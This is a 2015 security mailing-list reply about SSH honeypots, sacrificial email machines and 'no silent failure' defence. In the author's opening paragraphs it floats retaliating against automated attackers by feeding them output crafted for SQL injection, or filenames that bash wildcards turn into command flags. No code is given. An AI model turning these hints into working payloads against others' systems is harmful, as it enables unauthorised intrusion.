Proven tradition out in the wild. I gather there are SSH honeypots that
allow logins with trivial attempts (pi/raspberry, admin/admin..), then
simply record which commands the attacker runs first. Usually they'll be
scripted commands to scope out the compromised system, and if it passes
muster it dials home.
I don't think those honeypots are designed to make much of a human
attacker, but they allow rapid identification and classification of
who's attacking and offer some scope for countermeasures.
For example, if your attacker is running a certain command and capturing
a certain form of expected output, what happens if your honeypot gives
it too much, or a different kind of output? :)
Is your automated attacker using SQL to store attack data? I hope it's
escaping input.. Is your attacker using stars in any commands ('grep
foobar *')? Did you know you can have filenames that look like shell
command flags and bash will uncritically pass them as arguments?
On 03/02/15 18:55, Natanael wrote:
Den 3 feb 2015 19:19 skrev "coderman" <[email protected]
<mailto:[email protected]>>:
>
> On 2/3/15, [email protected] <mailto:[email protected]> <[email protected]
<mailto:[email protected]>> wrote:
> > ...
> > John, you know this I'm sure, but for the record the highest
> > security places use sacrificial machines to receive e-mail and
> > the like, to print said transmissions to paper, and then those
> > (sacrificial) machines are sacrificed, which is to say they
> > are reloaded/rebooted. Per message. The printed forms then
> > cross an air gap and those are scanned before transmission to
> > a final destination on networks of a highly controlled sort.
> > I suspect, but do not know, that the sacrificial machines are
> > thoroughly instrumented in the countermeasure sense.
>
> this is defense to depths layered through hard experience lessons ;)
>
>
>
> > ... For the
> > entities of which I speak, the avoidance of silent failure is
> > taken seriously -- which brings us 'round to your (and my)
> > core belief: The sine qua non goal of security engineering is
> > "No Silent Failure."
>
> there was an interesting thread here last year on instrumenting
> runtimes to appear stock (vulnerable) but which fail in obvious ways
> when subversion is attempted. (after all, being able to observe an
> attack is the first step in defending against such a class...)
>
> "hack it first yourself, before your attacker does..."
Canary bugs / honeypot bugs?
--
Scientific Director, IndieBio Irish Programme
Got a biology-inspired business idea that $50,000 -
& 3 months in a well equipped lab could accelerate?
Apply for the Summer programme in Ireland:
http://indie.bio/apply-to-ireland
Twitter: @onetruecathal
Phone: +353876363185
miniLock: JjmYYngs7akLZUjkvFkuYdsZ3PyPHSZRBKNm6qTYKZfAM
peerio.com: cathalgarvey
